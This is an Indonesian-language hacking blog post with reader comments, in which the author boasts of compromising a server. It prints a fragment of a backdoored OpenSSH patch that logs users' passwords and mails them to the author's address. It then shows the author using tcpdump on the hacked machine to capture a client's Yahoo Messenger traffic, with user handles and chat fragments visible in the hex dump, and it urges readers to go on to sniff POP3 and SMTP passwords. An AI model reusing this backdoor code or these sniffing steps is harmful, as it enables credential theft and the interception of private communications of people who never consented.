Posted by kecoak on Apr 16, 2009

Tcpdump for kIdz

Categories: Kidz Game, Underground | 3 comments

Apakah tcpdump?
tcpdump adlah slh satu program linux,yg berfungsi untuk menangkap aliran paket
data dari eth0 eth1,yg lebih umum dikenal dengan Nm Sniffing
Ok sedikit berbagi pengalamn
tepatny kemarin ketika sy check email trnyata sdh ada bbrp log yg masuk
dri hasil Backdorinf port 22 OpenSSH 4.7p1 yg sy infect ke sbuah
server hasil rooting,ttg bgaiman cr backdooring itu sdh dijelaskn sblumnya oleh
para Dedengkot2 disini..hehehe 😀

//logs di file
+ if((f=fopen(LOGZ,"a"))!=NULL){
+ fprintf(f,"user:[email protected] --> %s:%s@%sn",authctxt->server_user,password,authctxt->host);
+ fclose(f);
+ }
+ //kirim ke server pake curl/mail terserah
+ //example pake 'mailx'
+ snprintf(logz,sizeof(logz),"tail -1 %s|mailx -s "[owned user]new fucked user" [cencored]@live.com",LOGZ);
+ system(logz);
...

anda dpt membaca dr script di atas,styap ada yg
melakukan koneksi ssh dr server itu kluar maupun stu localhost
otomatis terkirim ke email sya 😀
ok lgkah awal
sy login ke server hasil sniffed tsb,
lsg aja

[email protected]:/# cat etc/hosts

127.0.0.1       localhost server0
xx.xxx.xx.xxx   rahasia.deh.id

#client customer
192.168.90.4     client1
192.168.90.10    client2
192.168.90.15    client3
192.168.90.51    client4
192.168.90.22    client5
192.168.90.201   client6

Woow..keknya server warnet nih..ato kantor ,g tau dah..^^
trs ak liat trafikny,trnyata g bsa iftop,mrka pakai Nload
hmm..

[email protected]:/# uname -a;cat etc/issue
Linux ds6471 2.6.22-8-server #1 SMP Thu Jul 12 16:28:57 GMT 2007 i686 GNU/Linux
Ubuntu 6.06 LTS n l

pakai ubuntu..:D,g pake lm lsg aj

[email protected]:/#apt-get install iftop

okee sdh terinstall

[email protected]:/#iftop -i eth1 -F 192.168.90.10/32

12.5Kb          25.0Kb          37.5Kb          50.0Kb    62.5Kb
+-------------------------------------------------------------------------------
192.168.90.10             <=> bs2.ads.vip.tpc.yahoo.com  5.25Kb  4.03Kb  2.99Kb
192.168.90.10             <=> tx-in-f113.google.com      3.66Kb  4.02Kb  4.22Kb
192.168.90.10             <=> ns3.turbodns.co.uk          748b   1.29Kb   983b
192.168.90.10             <=> 194.14.236.50              1.22Kb   250b    267b
192.168.90.10             <=> server6614.dedicated.webf     0b    188b     67b
192.168.90.10             <=> ds6488.dedicated.turbodns     0b    188b     67b
192.168.90.10             <=> raucousdns.co.uk              0b    188b     67b
192.168.90.10             <=> ad1.vip.rm.jp1.yahoo.net      0b    188b     67b
192.168.90.10             <=> server6485.dedicated.webf     0b    188b     67b
192.168.90.10             <=> in2.msg.vip.mud.yahoo.com    94kb   188b     67b
192.168.90.10             <=> server6542.dedicated.webf     0b    141b     50b
192.168.90.10             <=> server6437.dedicated.webf     0b    125b    132b
192.168.90.10             <=> 239.255.2.2                   0b     36b     13b
192.168.90.10             <=> server6577.dedicated.webf     0b      0b     67b
192.168.90.10             <=> server6636.dedicated.webf    90kb     0b     67b
192.168.90.10             <=> server6542.dedicated.webf     0b      0b     67b
192.168.90.10             <=> server6643.dedicated.webf     0b      0b     65b

--------------------------------------------------------------------------------
TX:             cumm:  64.4KB   peak:   3.08Kb  rates:   10.8Kb  1.72Kb  1.32Kb
RX:                    57.4KB           3.08Kb           12.6Kb  1.81Kb   904b
TOTAL:                  122KB           5.42Kb           114Kb  3.54Kb  2.21Kb

Ok ada bnyk trafik ke
disni ak akn coba sniff perckpan yahoo massnger.

[email protected]:/#tcpdump -n -f -s 0 -X -vvv -i eth1 port 5050 and host 192.168.90.10 >>log.txt
tcpdump: listening on eth1, link-type EN10MB (Ethernet), capture size 65535 bytes

[email protected]:~# ls -lia
total 80
1196084 drwxr-xr-x  7 root root  4096 Apr 16 10:47 .
1179916 drwxr-xr-x 19 root root 32768 Apr 15 07:47 ..
1459192 drwx------  2 root root  4096 Feb  7 05:30 .aptitude
1202658 -rw-------  1 root root  4480 Apr 16 10:47 .bash_history
1198732 -rw-r--r--  1 root root  2227 Oct 13  2005 .bashrc
1441948 drwxr-xr-x  5 root root  4096 Jan  7 15:05 .cpan
1427211 drwxr-xr-x  3 root root  4096 Apr 15 20:00 .mc
1461933 drwxr-xr-x  4 root root  4096 Apr 16 02:28 .msf3
1198731 -rw-r--r--  1 root root   141 Oct 13  2005 .profile
1427701 drwx------  2 root root  4096 Apr 15 01:04 .ssh
1197166 -rw-r--r--  1 root root  5642 Apr 16 10:47 log.txt
[email protected]:~#vi log.txt
04:38:19.084903 IP (tos 0x0, ttl  48, id 19232, offset 0, flags [DF], proto: TCP (6), length: 40) 68.180.217.12.mmcc > 192.168.90.10.spice: ., cksum 0xebfd (correct), 1186:1186(0) ack 1906 win 65535
0x0000:  4500 0028 4b20 4000 3006 d7ce 44b4 d90c  E..([email protected]...
0x0010:  0a00 0021 13ba 0783 cadb 4578 4b27 253d  ...!......ExK'%=
0x0020:  5010 ffff ebfd 0000                      P.......
04:38:19.088461 IP (tos 0x0, ttl  50, id 48894, offset 0, flags [DF], proto: TCP (6), length: 197) 68.180.217.6.mmcc > 192.168.90.10.adobeserver-2: P, cksum 0x2ad7 (correct), 251:408(157) ack 697 win 65535
0x0000:  4500 00c5 befe 4000 3206 6159 44b4 d906  [email protected]...
0x0010:  0a00 0021 13ba 044f 9c67 1abb 16f7 4f35  ...!...O.g....O5
0x0020:  5018 ffff 2ad7 0000 594d 5347 0010 0000  P...*...YMSG....
0x0030:  0089 0006 0000 0001 005a 514e 34c0 8064  .........ZQN4..d
0x0040:  696b 7375 6b6d 61c0 8030 c080 6469 6b73  iksukma..0..diks
0x0050:  756b 6d61 c080 31c0 8064 696b 7375 6b6d  ukma..1..indra_ram
0x0060:  61c0 8035 c080 6e61 7277 6173 7475 5f65  a..5.......
0x0070:  6b61 c080 3134 c080 4c68 6120 4d6f 6d20  ka..14..Lha.Mom.
0x0080:  6a67 206e 7461 7220 6c6f 7720 6472 6f70  jg.ntar.low.drop
0x0090:  2e2e 6269 6b69 6e20 7174 6132 2067 726f  ..bikin.qta2.gro
0x00a0:  6279 616b 616e 2064 6527 c080 3633 c080  byakan.de'..63..
0x00b0:  3b30 c080 3634 c080 30c0 8031 3030 3933  ;0..64..0..10093
0x00c0:  c080 34c0 80                             ..4..
04:38:19.281253 IP (tos 0x0, ttl 127, id 58814, offset 0, flags [DF], proto: TCP (6), length: 40) 192.168.90.10.adobeserver-2 > 68.180.217.6.mmcc: ., cksum 0x566e (correct), 697:697(0) ack 408 win 64405
0x0000:  4500 0028 e5be 4000 7f06 ee35 0a00 0021  E..([email protected]...!
0x0010:  44b4 d906 044f 13ba 16f7 4f35 9c67 1b58  D....O....O5.g.X
0x0020:  5010 fb95 566e 0000 0000 0000 0000       P...Vn........
04:38:27.311007 IP (tos 0x0, ttl 127, id 59642, offset 0, flags [DF], proto: TCP (6), length: 116) 192.168.90.10.adobeserver-2 > 68.180.217.6.mmcc: P, cksum 0xa725 (correct), 697:773(76) ack 408 win 64405
0x0000:  4500 0074 e8fa 4000 7f06 eaad 0a00 0021  E..t..@........!
0x0010:  44b4 d906 044f 13ba 16f7 4f35 9c67 1b58  D....O....O5.g.X
0x0020:  5018 fb95 a725 0000 594d 5347 0010 0000  P....%..YMSG....
0x0030:  0038 004b 0000 0016 005a 514e 3439 c080  .8.K.....ZQN49..
0x0040:  5459 5049 4e47 c080 31c0 806e 6172 7761  TYPING..1..nnina
0x0050:  7374 755f 656b 61c0 8031 34c0 8020 c080  _dewi..14.....
0x0060:  3133 c080 31c0 8035 c080 6469 6b73 756b  13..1..5..indra_ra
0x0070:  6d61 c080                                ma..
04:38:27.656225 IP (tos 0x0, ttl  50, id 25872, offset 0, flags [DF], proto: TCP (6), length: 40) 68.180.217.6.mmcc > 192.168.90.10.adobeserver-2: ., cksum 0x51b8 (correct), 408:408(0) ack 773 win 65535
0x0000:  4500 0028 6510 4000 3206 bbe4 44b4 d906  E..([email protected]...
0x0010:  0a00 0021 13ba 044f 9c67 1b58 16f7 4f81  ...!...O.g.X..O.
0x0020:  5010 ffff 51b8 0000                      P...Q...
04:38:27.935586 IP (tos 0x0, ttl 127, id 59670, offset 0, flags [DF], proto: TCP (6), length: 116) 192.168.90.10.adobeserver-2 > 68.180.217.6.mmcc: P, cksum 0xa725 (correct), 697:773(76) ack 408 win 64405
0x0000:  4500 0074 e916 4000 7f06 ea91 0a00 0021  E..t..@........!
0x0010:  44b4 d906 044f 13ba 16f7 4f35 9c67 1b58  D....O....O5.g.X
0x0020:  5018 fb95 a725 0000 594d 5347 0010 0000  P....%..YMSG....
0x0030:  0038 004b 0000 0016 005a 514e 3439 c080  .8.K.....ZQN49..
0x0040:  5459 5049 4e47 c080 31c0 806e 6172 7761  TYPING..1..
0x0050:  7374 755f 656b 61c0 8031 34c0 8020 c080  ..14.....
0x0060:  3133 c080 31c0 8035 c080 6469 6b73 756b  13..1..5..indra_ra
0x0070:  6d61 c080                                ma..
04:38:28.145719 IP (tos 0x0, ttl  50, id 32447, offset 0, flags [DF], proto: TCP (6), length: 40) 68.180.217.6.mmcc > 192.168.90.10.adobeserver-2: ., cksum 0x51b8 (correct), 408:408(0) ack 773 win 65535
0x0000:  4500 0028 7ebf 4000 3206 a235 44b4 d906  E..([email protected]...
0x0010:  0a00 0021 13ba 044f 9c67 1b58 16f7 4f81  ...!...O.g.X..O.
0x0020:  5010 ffff 51b8 0000                      P...Q...
04:38:30.059920 IP (tos 0x0, ttl 127, id 59763, offset 0, flags [DF], proto: TCP (6), length: 77) 192.168.90.10.adobeserver-2 > 68.180.217.6.mmcc: P, cksum 0x9d0a (correct), 773:810(37) ack 408 win 64405
0x0000:  4500 004d e973 4000 7f06 ea5b 0a00 0021  E..M.s@....[...!
0x0010:  44b4 d906 044f 13ba 16f7 4f81 9c67 1b58  D....O....O..g.X
0x0020:  5018 fb95 9d0a 0000 594d 5347 0010 0000  P.......YMSG....
0x0030:  0011 008a 0000 0000 005a 514e 30c0 806e  .........ZQN0..n
0x0040:  6172 7761 7374 755f 656b 61c0 80         nina_dewi..
04:38:30.371870 IP (tos 0x0, ttl  50, id 60817, offset 0, flags [DF], proto: TCP (6), length: 40) 68.180.217.6.mmcc > 192.168.90.10.adobeserver-2: ., cksum 0x5193 (correct), 408:408(0) ack 810 win 65535
0x0000:  4500 0028 ed91 4000 3206 3363 44b4 d906  E..([email protected]...
0x0010:  0a00 0021 13ba 044f 9c67 1b58 16f7 4fa6  ...!...O.g.X..O.
0x0020:  5010 ffff 5193 0000                      P...Q...
04:38:38.347798 IP (tos 0x0, ttl 127, id 59995, offset 0, flags [DF], proto: TCP (6), length: 146) 192.168.90.10.adobeserver-2 > 68.180.217.6.mmcc: P, cksum 0x0704 (correct), 810:916(106) ack 408 win 64405
0x0000:  4500 0092 ea5b 4000 7f06 e92e 0a00 0021  E....[@........!
0x0010:  44b4 d906 044f 13ba 16f7 4fa6 9c67 1b58  D....O....O..g.X
0x0020:  5018 fb95 0704 0000 594d 5347 0010 0000  P.......YMSG....
0x0030:  0056 0006 5a55 aa56 005a 514e 31c0 806e  .V..ZU.V.ZQN1..n
0x0040:  6172 7761 7374 755f 656b 61c0 8035 c080  nina_dewi..5..
0x0050:  6469 6b73 756b 6d61 c080 3937 c080 31c0  indra_rama..97..1.
0x0060:  8036 33c0 803b 30c0 8036 34c0 8030 c080  .63..;0..64..0..
0x0070:  3230 36c0 8031 c080 3134 c080 6472 7064  206..1..14..drpd
0x0080:  2041 2720 7967 2064 726f 7020 6861 796f  .A'.yg.drop.hayo
0x0090:  c080                                     ..
04:38:38.663087 IP (tos 0x0, ttl  50, id 36364, offset 0, flags [DF], proto: TCP (6), length: 40) 68.180.217.6.mmcc > 192.168.90.10.adobeserver-2: ., cksum 0x5129 (correct), 408:408(0) ack 916 win 65535
0x0000:  4500 0028 8e0c 4000 3206 92e8 44b4 d906  E..([email protected]...
0x0010:  0a00 0021 13ba 044f 9c67 1b58 16f7 5010  ...!...O.g.X..P.
0x0020:  5010 ffff 5129 0000                      P...Q)..
04:38:38.675807 IP (tos 0x0, ttl 127, id 60002, offset 0, flags [DF], proto: TCP (6), length: 192) 192.168.90.10.adobeserver-2 > 68.180.217.6.mmcc: P, cksum 0xf909 (correct), 916:1068(152) ack 408 win 64405
0x0000:  4500 00c0 ea62 4000 7f06 e8f9 0a00 0021  E....b@........!
0x0010:  44b4 d906 044f 13ba 16f7 5010 9c67 1b58  D....O....P..g.X
0x0020:  5018 fb95 f909 0000 594d 5347 0010 0000  P.......YMSG....
0x0030:  0038 004b 0000 0016 005a 514e 3439 c080  .8.K.....ZQN49..
0x0040:  5459 5049 4e47 c080 31c0 806e 6172 7761  TYPING..1..
0x0050:  7374 755f 656b 61c0 8031 34c0 8020 c080  dewi_eka..14.....
0x0060:  3133 c080 30c0 8035 c080 6469 6b73 756b  13..0..5..indra_ra
0x0070:  6d61 c080 594d 5347 0010 0000 0038 004b  ma..YMSG.....8.K
0x0080:  0000 0016 005a 514e 3439 c080 5459 5049  .....ZQN49..TYPI
0x0090:  4e47 c080 31c0 806e 6172 7761 7374 755f  NG..1..anak_
0x00a0:  656b 61c0 8031 34c0 8020 c080 3133 c080  ilang..14.....13..
0x00b0:  30c0 8035 c080 6469 6b73 756b 6d61 c080  0..5..indra_rama..
04:38:38.987713 IP (tos 0x0, ttl  50, id 40636, offset 0, flags [DF], proto: TCP (6), length: 40) 68.180.217.6.mmcc > 192.168.90.10.adobeserver-2: ., cksum 0x5091 (correct), 408:408(0) ack 1068 win 65535
0x0000:  4500 0028 9ebc 4000 3206 8238 44b4 d906  E..([email protected]...
0x0010:  0a00 0021 13ba 044f 9c67 1b58 16f7 50a8  ...!...O.g.X..P.
0x0020:  5010 ffff 5091 0000                      P...P...

yap kita telah me log percakapan mreka..
nah sekarang bagimana untuk sniff password,data2 ptg
bnyak berbagai cr…
selanjutnya anda dapet mengembangkn sendiri..
untk seperti pop3 ,smtp,dll..

Cheers,
Xsniffer

Post a Comment

3 Responses to “Tcpdump for kIdz”

  1. CyberTank says:
    April 22, 2009 at 5:36 am

    coba deh liat2 disini http://www.pcapr.net

    Reply
  2. hitsal says:
    May 8, 2009 at 8:02 pm

    Waah, keren ya punya backdoor suatu server.
    SSH yg merupakan secure telnet jadi gak mempan. 😀

    Reply
  3. black h0le says:
    August 22, 2009 at 1:49 pm

    menyimak dulu ah

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *